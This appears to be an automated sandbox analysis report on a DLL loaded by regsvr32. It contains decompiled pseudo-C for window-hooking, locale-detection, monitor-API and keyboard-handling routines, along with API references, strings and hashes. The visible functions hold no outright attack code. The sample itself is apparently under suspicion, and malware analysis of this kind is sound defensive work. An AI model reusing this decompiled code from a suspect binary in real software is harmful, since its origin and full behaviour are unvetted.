0x6da41faa
0x6da41fad
0x6da41fb5
0x6da41fb7
0x6da41fb7
0x6da41fc0
0x6da41fd5
0x6da41fd7
0x6da41fdf
0x6da41fe3
0x6da41fe9
0x6da41feb
0x6da42002
0x6da42002
0x6da42009
0x6da42056
0x6da42056
0x6da42058
0x6da420c0
0x6da420c8
0x6da42104
0x6da42110
0x6da42117
0x6da42149
0x6da4214c
0x6da42152
0x6da42155
0x6da42157
0x6da4215f
0x6da42166
0x6da42168
0x6da4216a
0x6da42171
0x6da42179
0x6da4217b
0x6da4217e
0x6da42181
0x6da4218f
0x6da4218f
0x6da4217e
0x6da4216a
0x6da42195
0x6da4219b
0x6da421a7
0x6da421ad
0x6da421b4
0x6da421b6
0x6da421bb
0x6da421c1
0x6da421c1
0x6da421c1
0x6da421c1
0x00000000
0x6da421c5
0x00000000
0x6da42119
0x6da420cc
0x6da420d7
0x6da420e2
0x6da420e8
0x6da420ee
0x6da420ef
0x6da420f1
0x6da420f9
0x6da420ff
0x6da42102
0x6da42128
0x6da4212e
0x6da42130
0x00000000
0x00000000
0x6da4213a
0x6da4213e
0x6da42145
0x6da42147
0x00000000
0x00000000
0x00000000
0x6da42147
0x00000000
0x6da42102
0x6da42060
0x6da42065
0x6da4206c
0x6da42075
0x6da4208b
0x6da4208d
0x6da42093
0x6da42095
0x6da42097
0x6da42097
0x6da4209f
0x6da420a3
0x6da420a7
0x6da420ab
0x6da420b1
0x6da420b4
0x6da420b6
0x6da420b6
0x00000000
0x6da420ab
0x6da4200e
0x6da42014
0x6da42019
0x00000000
0x00000000
0x6da4201f
0x6da42022
0x6da42027
0x6da42034
0x6da42038
0x6da4203e
0x6da4203e
0x6da42047
0x6da4204d
0x6da4204e
0x6da42050
0x00000000
0x00000000
0x00000000
0x6da42050
0x6da41fed
0x6da41ff4
0x00000000
0x00000000
0x6da41ffa
0x6da41ffc
0x00000000
0x00000000
0x00000000
0x6da41fc2
0x6da41fca
0x6da421c7
0x6da421cc
0x6da421cc

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA41F86

Part of subcall function 6DA4A4F0: __EH_prolog3.LIBCMT ref: 6DA4A4F7

CallNextHookEx.USER32 ref: 6DA41FCA

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

GetClassLongA.USER32(?,000000E6), ref: 6DA4200E
GlobalGetAtomNameA.KERNEL32 ref: 6DA42038
SetWindowLongA.USER32 ref: 6DA4208D
GetClassLongA.USER32(?,000000E0), ref: 6DA42107
GetClassNameA.USER32(?,?,00000100), ref: 6DA42128
GetWindowLongA.USER32(?,000000FC), ref: 6DA4214C
GetPropA.USER32(?,AfxOldWndProc423), ref: 6DA42166
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 6DA42171
GetPropA.USER32(?,AfxOldWndProc423), ref: 6DA42179
GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 6DA42181
SetWindowLongA.USER32 ref: 6DA4218F
CallNextHookEx.USER32 ref: 6DA421A7
UnhookWindowsHookEx.USER32 ref: 6DA421BB

Strings

ime, xrefs: 6DA42041
AfxOldWndProc423, xrefs: 6DA4215F, 6DA42164, 6DA4216F, 6DA42177, 6DA42180
#32768, xrefs: 6DA420E9, 6DA420EE, 6DA42138

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows
String ID: #32768$AfxOldWndProc423$ime
API String ID: 2841887895-4034971020
Opcode ID: 48a27a63864d9b0db10eda2e330c6fb5e8ebde5ef90caa696cde5b7df07f882a
Instruction ID: 50ca814f2e771aafab7c60a9c58c136112c34b0479403be27e14594238b7be0f
Opcode Fuzzy Hash: 48a27a63864d9b0db10eda2e330c6fb5e8ebde5ef90caa696cde5b7df07f882a
Instruction Fuzzy Hash: A361E43950C326ABDB219F65CD48BAE7BB8AF0A365F158154F606E61C0DB34C9C1CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4644B Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 158
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DA4644B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t76;
				unsigned int _t79;
				signed short _t87;
				unsigned int _t88;
				_Unknown_base(*)()* _t95;
				signed short _t97;
				unsigned int _t98;
				signed int _t106;
				signed int _t118;
				signed int _t127;
				void* _t130;

				_push(0x15c);
				E6DA5C876(E6DA6E3B5, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t130 - 0x124)) =  *((intOrPtr*)(_t130 + 8));
				_t123 = 0;
				 *((intOrPtr*)(_t130 - 0x130)) =  *((intOrPtr*)(_t130 + 0xc));
				 *(_t130 - 0x120) = 0;
				 *(_t130 - 0x11c) = 0;
				_t61 = GetModuleHandleA("kernel32.dll");
				_t106 = GetProcAddress;
				 *(_t130 - 0x134) = _t61;
				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
				if(_t62 == 0) {
					_t63 = GetModuleHandleA("ntdll.dll");
					if(_t63 != 0) {
						 *(_t130 - 0x120) = 0;
						EnumResourceLanguagesA(_t63, 0x10, 1, E6DA45D09, _t130 - 0x120);
						if( *(_t130 - 0x120) != 0) {
							_t79 =  *(_t130 - 0x120) & 0x0000ffff;
							_t123 = _t79 & 0x3ff;
							 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t79 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
							 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale(_t123);
							 *(_t130 - 0x11c) = 2;
						}
					}
				} else {
					_t87 =  *_t62() & 0x0000ffff;
					 *(_t130 - 0x120) = _t87;
					_t88 = _t87 & 0x0000ffff;
					_t123 = 0x3ff;
					_t118 = _t88 & 0x3ff;
					 *(_t130 - 0x11c) = _t118;
					 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t88 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t118);
					 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale( *(_t130 - 0x11c));
					 *(_t130 - 0x11c) = 2;
					_t95 = GetProcAddress( *(_t130 - 0x134), "GetSystemDefaultUILanguage");
					if(_t95 != 0) {
						_t97 =  *_t95() & 0x0000ffff;
						 *(_t130 - 0x120) = _t97;
						_t98 = _t97 & 0x0000ffff;
						_t123 = _t98 & 0x3ff;
						 *((intOrPtr*)(_t130 - 0x140)) = ConvertDefaultLocale(_t98 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
						 *((intOrPtr*)(_t130 - 0x13c)) = ConvertDefaultLocale(_t123);
						 *(_t130 - 0x11c) = 4;
					}
				}
				 *(_t130 - 0x11c) =  &(1[ *(_t130 - 0x11c)]);
				 *((intOrPtr*)(_t130 +  *(_t130 - 0x11c) * 4 - 0x148)) = 0x800;
				_t126 = 0x6da20000;
				 *((char*)(_t130 - 0x13)) = 0;
				 *((char*)(_t130 - 0x14)) = 0;
				if(GetModuleFileNameA(0x6da20000, _t130 - 0x118, 0x105) != 0) {
					_t123 = 0x20;
					_t106 = 0;
					E6DA5C5A0(_t123, _t130 - 0x168, 0, _t123);
					 *(_t130 - 0x168) = _t123;
					 *((intOrPtr*)(_t130 - 0x160)) = _t130 - 0x118;
					 *((intOrPtr*)(_t130 - 0x154)) = 0x3e8;
					 *(_t130 - 0x14c) = 0x6da20000;
					 *((intOrPtr*)(_t130 - 0x164)) = 0x88;
					E6DA45D23(_t130 - 0x12c, 0xffffffff);
					 *(_t130 - 4) = 0;
					if(E6DA45DDA(_t130 - 0x12c, _t130 - 0x168) != 0) {
						E6DA45E14(_t130 - 0x12c);
					}
					_t127 = 0;
					if( *(_t130 - 0x11c) <= _t106) {
						L13:
						_t126 = 0;
						goto L15;
					} else {
						while(1) {
							_t76 = E6DA4621B( *((intOrPtr*)(_t130 - 0x124)),  *((intOrPtr*)(_t130 - 0x130)),  *((intOrPtr*)(_t130 + _t127 * 4 - 0x148)));
							if(_t76 != _t106) {
								_t126 = _t76;
								break;
							}
							_t127 =  &(1[_t127]);
							if(_t127 <  *(_t130 - 0x11c)) {
								continue;
							}
							goto L13;
						}
						L15:
						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
						E6DA462ED(_t130 - 0x12c);
						goto L7;
					}
				}
				L7:
				return E6DA5C8F9(_t106, _t123, _t126);
			}

0x6da4644b
0x6da46455
0x6da46463
0x6da4646c
0x6da46473
0x6da46479
0x6da4647f
0x6da46485
0x6da46487
0x6da46493
0x6da46499
0x6da4649d
0x6da4654d
0x6da46551
0x6da46564
0x6da4656a
0x6da46577
0x6da46579
0x6da46594
0x6da465a0
0x6da465a8
0x6da465ae
0x6da465ae
0x6da46577
0x6da464a3
0x6da464ab
0x6da464ae
0x6da464b4
0x6da464bc
0x6da464c6
0x6da464cf
0x6da464dd
0x6da464f0
0x6da464f6
0x6da46500
0x6da46504
0x6da4650c
0x6da4650f
0x6da46515
0x6da46522
0x6da4652e
0x6da46536
0x6da4653c
0x6da4653c
0x6da46504
0x6da465be
0x6da465c4
0x6da465db
0x6da465e1
0x6da465e5
0x6da465f1
0x6da465fd
0x6da465ff
0x6da46609
0x6da4661f
0x6da46625
0x6da4662b
0x6da46635
0x6da4663b
0x6da46645
0x6da46657
0x6da46661
0x6da46669
0x6da46669
0x6da4666e
0x6da46676
0x6da4669e
0x6da4669e
0x00000000
0x6da46678
0x6da46678
0x6da4668b
0x6da46693
0x6da466a2
0x6da466a2
0x6da466a2
0x6da46695
0x6da4669c
0x00000000
0x00000000
0x00000000
0x6da4669c
0x6da466a4
0x6da466a4
0x6da466ae
0x00000000
0x6da466b3
0x6da46676
0x6da465f3
0x6da465f8

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA46455
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6DA4671C,?,?), ref: 6DA46485
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6DA46499
ConvertDefaultLocale.KERNEL32(?), ref: 6DA464D5
ConvertDefaultLocale.KERNEL32(?), ref: 6DA464E3
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6DA46500
ConvertDefaultLocale.KERNEL32(?), ref: 6DA4652B
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6DA46534
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 6DA4654D
EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00025D09,?), ref: 6DA4656A
ConvertDefaultLocale.KERNEL32(?), ref: 6DA4659D
ConvertDefaultLocale.KERNEL32(00000000), ref: 6DA465A6
GetModuleFileNameA.KERNEL32(6DA20000,?,00000105), ref: 6DA465E9

Strings

GetSystemDefaultUILanguage, xrefs: 6DA464E5
ntdll.dll, xrefs: 6DA46548
kernel32.dll, xrefs: 6DA4646E
GetUserDefaultUILanguage, xrefs: 6DA4648D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 2376270827-2299501126
Opcode ID: 74f4949573fef688cbdc6ad8317be2f36085b8b55a82fbeddedba93942c3ad86
Instruction ID: cafbb1eafdec0a187328e04c580cd28811ee924686a6fc4fa234c8d696f29a0c
Opcode Fuzzy Hash: 74f4949573fef688cbdc6ad8317be2f36085b8b55a82fbeddedba93942c3ad86
Instruction Fuzzy Hash: 05512A75D082389FCB65DF658C447EDBBB4AB59301F0581EAA548E3280DB748AC1CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3DE2E Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E6DA3DE2E() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x6da855cc - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x6da855d0 = E6DA3DDD4(_t17, _t21, __eflags);
					_t19 = GetModuleHandleA("USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L12:
						 *0x6da855b0 = _t17;
						 *0x6da855b4 = _t17;
						 *0x6da855b8 = _t17;
						 *0x6da855bc = _t17;
						 *0x6da855c0 = _t17;
						 *0x6da855c4 = _t17;
						 *0x6da855c8 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x6da855b0 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x6da855b4 = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x6da855b8 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x6da855bc = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x6da855c4 = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
											 *0x6da855c0 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
												 *0x6da855c8 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x6da855cc = 1;
					return _t5;
				} else {
					_t25 =  *0x6da855c0 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}

0x6da3de31
0x6da3de33
0x6da3de39
0x6da3de48
0x6da3de54
0x6da3de5f
0x6da3de61
0x6da3de63
0x6da3def7
0x6da3def7
0x6da3defd
0x6da3df03
0x6da3df09
0x6da3df0f
0x6da3df15
0x6da3df1b
0x6da3df21
0x6da3de69
0x6da3de75
0x6da3de77
0x6da3de7c
0x6da3de7e
0x00000000
0x6da3de80
0x6da3de86
0x6da3de88
0x6da3de8d
0x6da3de8f
0x00000000
0x6da3de91
0x6da3de97
0x6da3de99
0x6da3de9e
0x6da3dea0
0x00000000
0x6da3dea2
0x6da3dea8
0x6da3deaa
0x6da3deaf
0x6da3deb1
0x00000000
0x6da3deb3
0x6da3deb9
0x6da3debb
0x6da3dec0
0x6da3dec2
0x00000000
0x6da3dec4
0x6da3deca
0x6da3decc
0x6da3ded1
0x6da3ded3
0x00000000
0x6da3ded5
0x6da3dedb
0x6da3dedd
0x6da3dee2
0x6da3dee4
0x00000000
0x6da3dee6
0x6da3dee8
0x6da3dee8
0x6da3dee8
0x6da3dee4
0x6da3ded3
0x6da3dec2
0x6da3deb1
0x6da3dea0
0x6da3de8f
0x6da3de7e
0x6da3deeb
0x6da3def6
0x6da3de3b
0x6da3de3d
0x6da3de47
0x6da3de47

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,6DA3DF83,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DE59
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DE75
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DE86
GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DE97
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DEA8
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DEB9
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DECA
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,6DA400AB,00000000,00000002,00000028), ref: 6DA3DEDB

Strings

EnumDisplayMonitors, xrefs: 6DA3DEB3
MonitorFromRect, xrefs: 6DA3DE91
MonitorFromPoint, xrefs: 6DA3DEA2
GetMonitorInfoA, xrefs: 6DA3DEC4
MonitorFromWindow, xrefs: 6DA3DE80
USER32, xrefs: 6DA3DE4F
GetSystemMetrics, xrefs: 6DA3DE6F
EnumDisplayDevicesA, xrefs: 6DA3DED5

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 75c0b0d17647fe3f5534d176c8979ed0220f1eb5edb1c6bf8faabe88a1004e1c
Instruction ID: 6ab14f0fe6ab7d13a0e50ff4003fec738f1cc37cf38c696870290d9b2e21bf8d
Opcode Fuzzy Hash: 75c0b0d17647fe3f5534d176c8979ed0220f1eb5edb1c6bf8faabe88a1004e1c
Instruction Fuzzy Hash: 26212F7A91D362DFCF146F6588D853E7EFAB68B202766883FDD12D2501D73884829F01

Uniqueness

Uniqueness Score: -1.00%

Function 6DA210E0 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DA210E0(intOrPtr __ecx, signed long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t33;
				signed int _t60;
				void* _t61;
				void* _t62;
				signed long long _t67;

				_t67 = __fp0;
				_push(0xffffffff);
				_push(E6DA6DB98);
				_push( *[fs:0x0]);
				_t62 = _t61 - 0x14;
				_t33 =  *0x6da82744; // 0x616b45bb
				_push(_t33 ^ _t60);
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				_v28 = 0;
				E6DA212E0( &_v20);
				_v8 = 0;
				_v24 = E6DA212B0(_v32);
				_v36 = _v24;
				_v36 = _v36 - 0x39f;
				if(_v36 > 0x89) {
					L8:
					asm("fild dword [ebp-0x14]");
					 *(_t62 - 8) = _t67 /  *0x6da708a8;
					_push("%.1fMHz");
					_push( &_v20);
					E6DA21AF0( &_v20);
				} else {
					_t14 = _v36 + 0x6da21224; // 0x55cccc05
					switch( *((intOrPtr*)(( *_t14 & 0x000000ff) * 4 +  &M6DA21208))) {
						case 0:
							E6DA21340( &_v20, "SWR3");
							goto L9;
						case 1:
							__ecx =  &_v20;
							E6DA21340(__ecx, "Easy, Gotti!");
							goto L9;
						case 2:
							__ecx =  &_v20;
							E6DA21340(__ecx, "Spice Radio");
							goto L9;
						case 3:
							__ecx =  &_v20;
							E6DA21340(__ecx, "Radio Gaga");
							goto L9;
						case 4:
							__ecx =  &_v20;
							E6DA21340(__ecx, "Classic 1");
							goto L9;
						case 5:
							__ecx =  &_v20;
							E6DA21340(__ecx, "Radio ISS");
							goto L9;
						case 6:
							goto L8;
					}
				}
				L9:
				E6DA21300(_a4,  &_v20);
				_v28 = _v28 | 0x00000001;
				_v8 = 0xffffffff;
				E6DA21320( &_v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x6da210e0
0x6da210e3
0x6da210e5
0x6da210f0
0x6da210f1
0x6da210f4
0x6da210fb
0x6da210ff
0x6da21105
0x6da21108
0x6da21112
0x6da21117
0x6da21126
0x6da2112c
0x6da21138
0x6da21142
0x6da211af
0x6da211af
0x6da211bb
0x6da211be
0x6da211c6
0x6da211c7
0x6da21144
0x6da21147
0x6da2114e
0x00000000
0x6da2115d
0x00000000
0x00000000
0x6da21187
0x6da2118a
0x00000000
0x00000000
0x6da21178
0x6da2117b
0x00000000
0x00000000
0x6da21196
0x6da21199
0x00000000
0x00000000
0x6da21169
0x6da2116c
0x00000000
0x00000000
0x6da211a5
0x6da211a8
0x00000000
0x00000000
0x00000000
0x00000000
0x6da2114e
0x6da211cf
0x6da211d6
0x6da211e1
0x6da211e4
0x6da211ee
0x6da211f9
0x6da21204

APIs

Part of subcall function 6DA212B0: SendMessageA.USER32 ref: 6DA212C7

_DebugHeapAllocator.LIBCPMTD ref: 6DA2115D
_DebugHeapAllocator.LIBCPMTD ref: 6DA2116C
_DebugHeapAllocator.LIBCPMTD ref: 6DA2117B
_DebugHeapAllocator.LIBCPMTD ref: 6DA2118A
_DebugHeapAllocator.LIBCPMTD ref: 6DA21199
_DebugHeapAllocator.LIBCPMTD ref: 6DA211A8
_DebugHeapAllocator.LIBCPMTD ref: 6DA211D6

Strings

Q$, xrefs: 6DA211C6
Radio ISS, xrefs: 6DA211A0
SWR3, xrefs: 6DA21155
Classic 1, xrefs: 6DA21164
%.1fMHz, xrefs: 6DA211BE
Radio Gaga, xrefs: 6DA21191
Easy, Gotti!, xrefs: 6DA21182
Spice Radio, xrefs: 6DA21173

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocatorDebugHeap$MessageSend
String ID: %.1fMHz$Classic 1$Easy, Gotti!$Q$$Radio Gaga$Radio ISS$SWR3$Spice Radio
API String ID: 3750178541-2611654878
Opcode ID: ace5892e418eab070fc2523a180d63b9c49bfc97a5d161e34f4b98643e2194bb
Instruction ID: 3667e033e52e82ae5bbf9b1486cebbaa78205440f223f975b3a481d1a65598e8
Opcode Fuzzy Hash: ace5892e418eab070fc2523a180d63b9c49bfc97a5d161e34f4b98643e2194bb
Instruction Fuzzy Hash: 80317C7091C21ADFCB04EFAACD51AFEB7B1FB45344F044529E521A2280DB361685CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5561F Relevance: 26.0, APIs: 17, Instructions: 453
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6DA5561F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				signed int _t203;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;

				_t236 = __edx;
				_t232 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E6DA55478(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E6DA3ED75(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E6DA3E977( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E6DA554CC(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E6DA54F50(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E6DA44898(_t232);
								asm("int3");
								_push(0x28);
								E6DA5C840(E6DA6EF29, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E6DA405F2(0, _t232, _t148);
								_t229 = 0x100;
								_v24 = _t149;
								__eflags = _t249 - 0x100;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E6DA405F2(_t229, _t232,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E6DA54EFA(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E6DA54EFA(_v24, _t240);
